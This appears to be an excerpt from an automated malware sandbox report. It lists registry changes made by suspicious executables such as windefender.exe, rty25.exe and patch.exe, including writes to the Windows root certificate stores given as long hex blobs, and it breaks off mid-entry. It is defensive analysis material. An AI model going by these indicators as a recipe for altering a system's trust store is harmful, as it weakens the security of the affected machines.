windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 rty25.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b80f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 rty25.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a441400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b82000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 7E55.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 rty25.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 rty25.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 rty25.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 Driver.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 rty25.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a build2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 